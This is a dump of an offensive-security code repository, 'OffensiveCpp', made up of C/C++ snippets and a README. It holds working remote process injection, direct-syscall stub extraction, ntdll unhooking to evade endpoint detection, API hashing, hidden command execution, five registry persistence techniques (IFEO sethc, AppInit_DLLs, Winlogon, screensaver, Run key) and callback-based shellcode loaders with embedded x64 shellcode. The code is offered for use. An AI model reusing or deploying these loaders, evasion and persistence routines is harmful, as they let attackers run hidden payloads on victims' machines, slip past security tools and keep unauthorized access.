56 | ACCESS_MASK AccessMask, 57 | POBJECT_ATTRIBUTES ObjectAttributes, 58 | PCLIENT_ID ClientID 59 | ); 60 | 61 | 62 | unsigned char buf[] = ""; 63 | 64 | int main(int argc, char* argv[]) { 65 | HANDLE ph; // process handle 66 | HANDLE rt; // remote thread 67 | PVOID rb; // remote buffer 68 | DWORD pid; // process ID 69 | 70 | pid = atoi(argv[1]); 71 | OBJECT_ATTRIBUTES oa; 72 | 73 | CLIENT_ID cid; 74 | 75 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL); 76 | cid.UniqueProcess = (PVOID)pid; 77 | cid.UniqueThread = 0; 78 | 79 | // loading ntdll.dll 80 | HMODULE ntdll = GetModuleHandleA("ntdll"); 81 | printf("PID: %i", pid); 82 | 83 | pNtOpenProcess myNtOpenProcess = (pNtOpenProcess)GetProcAddress(ntdll, "NtOpenProcess"); 84 | 85 | pNtAllocateVirtualMemory myNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory"); 86 | 87 | // open remote proces via NT API 88 | myNtOpenProcess(&ph, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, &oa, &cid); 89 | 90 | if (!ph) { 91 | printf("failed to open process :(\n"); 92 | return -2; 93 | } 94 | 95 | PVOID va = VirtualAllocEx(ph, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 96 | WriteProcessMemory(ph, va, buf, sizeof buf, NULL); 97 | HANDLE h_thread = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)va, NULL, 0, NULL); 98 | return 0; 99 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/getSyscall.h: -------------------------------------------------------------------------------- 1 | /* 2 | Credit: https://github.com/JohnWoodman/stealthInjector 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include "windows.h" 8 | #include "winternl.h" 9 | #pragma comment(lib, "ntdll") 10 | 11 | int const SYSCALL_STUB_SIZE = 23; 12 | 13 | PVOID RVAtoRawOffset(DWORD_PTR RVA, PIMAGE_SECTION_HEADER section) 14 | { 15 | return (PVOID)(RVA - section->VirtualAddress + 
section->PointerToRawData); 16 | } 17 | 18 | BOOL GetSyscallStub(LPCSTR functionName, LPVOID syscallStub) 19 | { 20 | HANDLE file = NULL; 21 | DWORD fileSize = NULL; 22 | DWORD bytesRead = NULL; 23 | LPVOID fileData = NULL; 24 | 25 | file = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 26 | fileSize = GetFileSize(file, NULL); 27 | fileData = HeapAlloc(GetProcessHeap(), 0, fileSize); 28 | ReadFile(file, fileData, fileSize, &bytesRead, NULL); 29 | 30 | PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)fileData; 31 | PIMAGE_NT_HEADERS imageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)fileData + dosHeader->e_lfanew); 32 | DWORD exportDirRVA = imageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 33 | PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(imageNTHeaders); 34 | PIMAGE_SECTION_HEADER textSection = section; 35 | PIMAGE_SECTION_HEADER rdataSection = section; 36 | 37 | for (int i = 0; i < imageNTHeaders->FileHeader.NumberOfSections; i++) 38 | { 39 | if (strcmp((CHAR*)section->Name, (CHAR*)".rdata") == 0) { 40 | rdataSection = section; 41 | break; 42 | } 43 | section++; 44 | } 45 | 46 | PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)RVAtoRawOffset((DWORD_PTR)fileData + exportDirRVA, rdataSection); 47 | 48 | PDWORD addressOfNames = (PDWORD)RVAtoRawOffset((DWORD_PTR)fileData + *(&exportDirectory->AddressOfNames), rdataSection); 49 | PDWORD addressOfFunctions = (PDWORD)RVAtoRawOffset((DWORD_PTR)fileData + *(&exportDirectory->AddressOfFunctions), rdataSection); 50 | BOOL stubFound = FALSE; 51 | 52 | for (size_t i = 0; i < exportDirectory->NumberOfNames; i++) 53 | { 54 | DWORD_PTR functionNameVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfNames[i], rdataSection); 55 | DWORD_PTR functionVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfFunctions[i + 1], textSection); 56 | LPCSTR functionNameResolved = 
(LPCSTR)functionNameVA; 57 | if (strcmp(functionNameResolved, functionName) == 0) 58 | { 59 | memcpy(syscallStub, (LPVOID)functionVA, SYSCALL_STUB_SIZE); 60 | stubFound = TRUE; 61 | } 62 | } 63 | 64 | return stubFound; 65 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/LoadLibraryA Syscalls/ZWALLOCATEVIRTUALMEMORY/ZWALLOCATEVIRTUALMEMORY.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ntdll.lib") 8 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 9 | 10 | typedef NTSTATUS(WINAPI* ZWALLOCATEVIRTUALMEMORY)( 11 | HANDLE ProcessHandle, 12 | PVOID* BaseAddress, 13 | ULONG_PTR ZeroBits, 14 | PSIZE_T RegionSize, 15 | ULONG AllocationType, 16 | ULONG Protect); 17 | 18 | unsigned char buf[] = ""; 19 | 20 | int main(int argc, char *argv[]) { 21 | 22 | PVOID pBaseAddress = nullptr; 23 | SIZE_T regionSize = sizeof(buf); 24 | ULONG allocationType = MEM_COMMIT | MEM_RESERVE; 25 | ULONG protect = PAGE_EXECUTE_READWRITE; 26 | 27 | 28 | // Get NTDLL 29 | HMODULE hNtDll = LoadLibrary(L"ntdll.dll"); 30 | if (hNtDll == NULL) 31 | { 32 | std::cerr << "LoadLibrary failed: " << GetLastError() << std::endl; 33 | return 1; 34 | } 35 | 36 | // Defines 37 | ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtDll, "ZwAllocateVirtualMemory"); 38 | if (ZwAllocateVirtualMemory == nullptr) { 39 | std::cerr << "Failed to load ZwAllocateVirtualMemory function" << std::endl; 40 | return 1; 41 | } 42 | 43 | HANDLE h_process = ::GetCurrentProcess(); 44 | 45 | NTSTATUS status = ZwAllocateVirtualMemory(h_process, &pBaseAddress, 0, ®ionSize, allocationType, protect); 46 | if (status == STATUS_SUCCESS) { 47 | std::cout << "Virtual memory allocated successfully at address " << pBaseAddress << std::endl; 48 | } 49 | else { 50 | std::cerr << "Failed to allocate 
virtual memory. Status: " << std::hex << status << std::endl; 51 | return 1; 52 | } 53 | 54 | return 0; 55 | } 56 | -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/LoadLibraryA Syscalls/ZWWRITEVIRTUALMEMORY/ZWWRITEVIRTUALMEMORY.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ntdll.lib") 8 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 9 | 10 | typedef NTSTATUS(WINAPI* ZWWRITEVIRTUALMEMORY)( 11 | HANDLE ProcessHandle, 12 | PVOID BaseAddress, 13 | PVOID Buffer, 14 | ULONG BufferSize, 15 | PULONG NumberOfBytesWritten); 16 | 17 | unsigned char buf[] = ""; 18 | 19 | int main(int argc, char *argv[]) { 20 | 21 | PVOID pBaseAddress = nullptr; 22 | ULONG bytesWritten = 0; 23 | 24 | 25 | // Get NTDLL 26 | HMODULE hNtDll = LoadLibrary(L"ntdll.dll"); 27 | if (hNtDll == NULL) 28 | { 29 | std::cerr << "LoadLibrary failed: " << GetLastError() << std::endl; 30 | return 1; 31 | } 32 | 33 | // Defines 34 | ZWWRITEVIRTUALMEMORY ZwWriteVirtualMemory = (ZWWRITEVIRTUALMEMORY)GetProcAddress(hNtDll, "NtWriteVirtualMemory"); 35 | if (ZwWriteVirtualMemory == nullptr) { 36 | std::cerr << "Failed to load NtWriteVirtualMemory function" << std::endl; 37 | return 1; 38 | } 39 | 40 | HANDLE h_process = ::GetCurrentProcess(); 41 | LPVOID alloc = ::VirtualAllocEx(h_process, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 42 | 43 | NTSTATUS status = ZwWriteVirtualMemory(h_process, alloc, buf, sizeof(buf), &bytesWritten); 44 | if (status == STATUS_SUCCESS) { 45 | std::cout << "Wrote " << bytesWritten << " bytes to virtual memory at address " << pBaseAddress << std::endl; 46 | } 47 | else { 48 | std::cerr << "Failed to write virtual memory. 
Status: " << std::hex << status << std::endl; 49 | return 1; 50 | } 51 | 52 | return 0; 53 | } 54 | -------------------------------------------------------------------------------- /Evasion Techniques/Unhooking/Unhook_ntdll.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Source: https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) 10 | { 11 | HANDLE process = GetCurrentProcess(); 12 | MODULEINFO mi = {}; 13 | HMODULE ntdllModule = GetModuleHandleA("ntdll.dll"); 14 | 15 | GetModuleInformation(process, ntdllModule, &mi, sizeof(mi)); 16 | LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll; 17 | HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); 18 | HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); 19 | LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0); 20 | 21 | 22 | PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase; 23 | PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew); 24 | 25 | for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) { 26 | PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 27 | 28 | if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) { 29 | DWORD oldProtection = 0; 30 | bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection); 31 | memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + 
(DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize); 32 | isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection); 33 | } 34 | } 35 | 36 | CloseHandle(process); 37 | CloseHandle(ntdllFile); 38 | CloseHandle(ntdllMapping); 39 | FreeLibrary(ntdllModule); 40 | } 41 | -------------------------------------------------------------------------------- /Evasion Techniques/WinAPI Hashing/myhash.py: -------------------------------------------------------------------------------- 1 | # simple stupid hashing example 2 | def myHash(data): 3 | hash = 0x35 4 | for i in range(0, len(data)): 5 | hash += ord(data[i]) + (hash << 1) 6 | print (hash) 7 | return hash 8 | 9 | myHash("VirtualAlloc") -------------------------------------------------------------------------------- /Misc Techniques/Execute_cmd.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | SHELLEXECUTEINFOW info = { sizeof(SHELLEXECUTEINFOW) }; 6 | info.lpFile = L"cmd.exe"; 7 | info.lpParameters = L"/c whoami"; 8 | info.nShow = SW_HIDE; 9 | info.lpVerb = L"open"; 10 | ::ShellExecuteEx(&info); 11 | } 12 | -------------------------------------------------------------------------------- /Persistence/admin_persistence_accessibility_features.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows persistence via Accessibility Features 3 | * Administrator level privileges are necessary to implement this trick. 
4 | * author: @cocomelonc 5 | */ 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) { 10 | HKEY hkey = NULL; 11 | 12 | // image file 13 | const char* img = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe"; 14 | 15 | // evil app 16 | const char* exe = "C:\\Windows\\System32\\hack.exe"; 17 | 18 | // Debugger 19 | LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL); 20 | if (res == ERROR_SUCCESS) { 21 | // create new registry key 22 | // reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /d "hack.exe" 23 | RegSetValueEx(hkey, (LPCSTR)"Debugger", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 24 | RegCloseKey(hkey); 25 | } 26 | 27 | return 0; 28 | } -------------------------------------------------------------------------------- /Persistence/admin_persistence_appinit_dlls.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows persistence via Appinit_DLLs 3 | * Administrator level privileges are necessary to implement this trick. 
4 | * author: @cocomelonc 5 | */ 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) { 10 | HKEY hkey = NULL; 11 | // malicious DLL 12 | const char* dll = "C:\\hack.dll"; 13 | // activation 14 | DWORD act = 1; 15 | 16 | // 32-bit and 64-bit 17 | LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey); 18 | if (res == ERROR_SUCCESS) { 19 | // create new registry keys 20 | RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act)); 21 | RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll)); 22 | RegCloseKey(hkey); 23 | } 24 | 25 | res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey); 26 | if (res == ERROR_SUCCESS) { 27 | // create new registry keys 28 | RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act)); 29 | RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dll, strlen(dll)); 30 | RegCloseKey(hkey); 31 | } 32 | return 0; 33 | } -------------------------------------------------------------------------------- /Persistence/admin_persistence_winlogon.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // This POC executes powershell.exe on system logon 5 | // It requires administrative privileges 6 | // https://youtu.be/VqDY2Tfz6Qw?t=20 7 | 8 | int main() { 9 | HKEY hKey; 10 | LPCSTR subKey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; 11 | LPCSTR valueName = "Shell"; 12 | LPCSTR newValue = "explorer.exe,powershell.exe"; 13 | 14 | LONG openResult = RegOpenKeyExA(HKEY_LOCAL_MACHINE, subKey, 0, KEY_SET_VALUE, &hKey); 15 | if (openResult != ERROR_SUCCESS) { 16 | printf("Error opening registry key. 
Error code: %d\n", openResult); 17 | return 1; 18 | } 19 | 20 | LONG setResult = RegSetValueExA(hKey, valueName, 0, REG_SZ, (BYTE*)newValue, strlen(newValue) + 1); 21 | if (setResult != ERROR_SUCCESS) { 22 | printf("Error setting registry value. Error code: %d\n", setResult); 23 | RegCloseKey(hKey); 24 | return 1; 25 | } 26 | 27 | printf("Registry value changed successfully.\n"); 28 | 29 | RegCloseKey(hKey); 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Persistence/screensaver_hijacking.c: -------------------------------------------------------------------------------- 1 | /* 2 | * windows low level persistense via screensaver 3 | * simple PoC 4 | * author: @cocomelonc 5 | * based on https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html 6 | * used by Turla APT in the wild 7 | */ 8 | #include 9 | #include 10 | 11 | int main(int argc, char* argv[]) { 12 | HKEY hkey = NULL; 13 | // malicious app 14 | const char* exe = "Z:\\hack.exe"; 15 | // timeout 16 | const char* ts = "10"; 17 | // activation 18 | const char* aact = "1"; 19 | 20 | // startup 21 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"Control Panel\\Desktop", 0 , KEY_WRITE, &hkey); 22 | if (res == ERROR_SUCCESS) { 23 | // create new registry keys 24 | RegSetValueEx(hkey, (LPCSTR)"ScreenSaveActive", 0, REG_SZ, (unsigned char*)aact, strlen(aact)); 25 | RegSetValueEx(hkey, (LPCSTR)"ScreenSaveTimeOut", 0, REG_SZ, (unsigned char*)ts, strlen(ts)); 26 | RegSetValueEx(hkey, (LPCSTR)"SCRNSAVE.EXE", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 27 | RegCloseKey(hkey); 28 | } 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Persistence/user_persistence_run.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // This POC executes powershell.exe when the specific user logs in again 5 | // It does not require administrative 
privileges 6 | // https://youtu.be/VqDY2Tfz6Qw?t=225 7 | 8 | 9 | int main() { 10 | HKEY hKey; 11 | LPCSTR subKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; 12 | LPCSTR valueName = "test"; 13 | LPCSTR valueData = "powershell.exe"; 14 | 15 | LONG openResult = RegCreateKeyExA(HKEY_CURRENT_USER, subKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); 16 | if (openResult != ERROR_SUCCESS) { 17 | printf("Error creating/opening registry key. Error code: %d\n", openResult); 18 | return 1; 19 | } 20 | 21 | LONG setResult = RegSetValueExA(hKey, valueName, 0, REG_SZ, (BYTE*)valueData, strlen(valueData) + 1); 22 | if (setResult != ERROR_SUCCESS) { 23 | printf("Error setting registry value. Error code: %d\n", setResult); 24 | RegCloseKey(hKey); 25 | return 1; 26 | } 27 | 28 | printf("Registry key added successfully.\n"); 29 | 30 | RegCloseKey(hKey); 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OffensiveCpp 2 | Offensive C++ is a collection of offensive security snippets written in C++. It includes various tools for penetration testing and exploit development. 3 | 4 | # Table of Contents 5 | * [OffensiveCpp](#offensivecpp) 6 | * [Introduction](#introduction) 7 | * [Why C/C++?](#why-cc) 8 | * [Compiling](#compiling) 9 | * [Reference Libraries](#reference-libraries) 10 | * [Contributing](#contributing) 11 | * [License](#license) 12 | 13 | # Introduction 14 | The purpose of this project is to provide colleciton of snippets that can be used for penetration testing and exploit development. Currently, the project contains snippets for: 15 | * AV/EDR Evasion 16 | * Enumeration 17 | * Sandbox Evasion 18 | * Shellcode Execution 19 | * WinAPI Examples 20 | 21 | # Why C/C++? 22 | * C/C++ is a compiled language, which means that it can produce code that is optimized for the specific target platform. 
23 | 24 | * C/C++ is a low-level programming language that offers a high degree of control over system resources. 25 | 26 | * C/C++ allows direct memory manipulation and flexibility. 27 | 28 | * C/C++ provides a high level of performance and efficiency. 29 | 30 | * C/C++ offers the ability to easily interface with other low-level languages like assembly. 31 | 32 | * C/C++ has a large and active community of developers, which means that there is a wealth of resources, libraries, and tools available for exploit development. 33 | 34 | # Compiling 35 | This repo does not come with precompiled binaries. Before compiling, make sure you have: 36 | 1. A C++ compiler: Microsoft Visual C++ compiler is included in Microsoft Visual Studio or you can install the GCC compiler through MinGW or Cygwin. 37 | 38 | 2. An Integrated Development Environment (IDE), in my case "Visual Studio 2017". 39 | 40 | 3. The Windows SDK: The Windows SDK includes headers, libraries, and tools that are necessary for developing Windows applications in C++. 41 | 42 | # Reference Libraries 43 | Here you can find a list of external open source project I have included. 44 | * [Shellcode Execution](https://github.com/aahmad097/AlternativeShellcodeExec) 45 | * [Sandbox Evasion](https://github.com/Arvanaghi/CheckPlease/tree/master/C) 46 | * [Unhooking NTDLL.dll](https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++) 47 | * [Direct Syscalls](https://github.com/JohnWoodman/stealthInjector) 48 | 49 | # Support 50 | You can support my work by becomming my [Patreon](https://www.patreon.com/Lsecqt). 51 | By doing so, you get access to my private packer, while keeping me motivated to produce more and better content. 52 | 53 | # Contributing 54 | Contributions to Offensive C++ are welcome. To contribute, please fork the repository and submit a pull request. Please make sure that your code is well-documented and tested. 
55 | 56 | # License 57 | Offensive C++ is released under the MIT License (https://opensource.org/license/mit/). Please see the LICENSE file for more information. -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStore/CertEnumSystemStore.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Requires Crypt32.lib 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | 37 | 
::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr); 38 | 39 | 40 | } -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStore/CertEnumSystemStore.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // requires Crypt32.lib 6 | 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | 
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | ::RtlMoveMemory(addr, op, sizeof(op)); 37 | 38 | ::CertEnumSystemStoreLocation(NULL, nullptr, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)addr); 39 | 40 | } -------------------------------------------------------------------------------- /Shellcode Execution/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CopyFile2/CopyFile2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | 15 | // alfarom256 calc shellcode 16 | unsigned char op[] = 17 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 18 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 19 | 
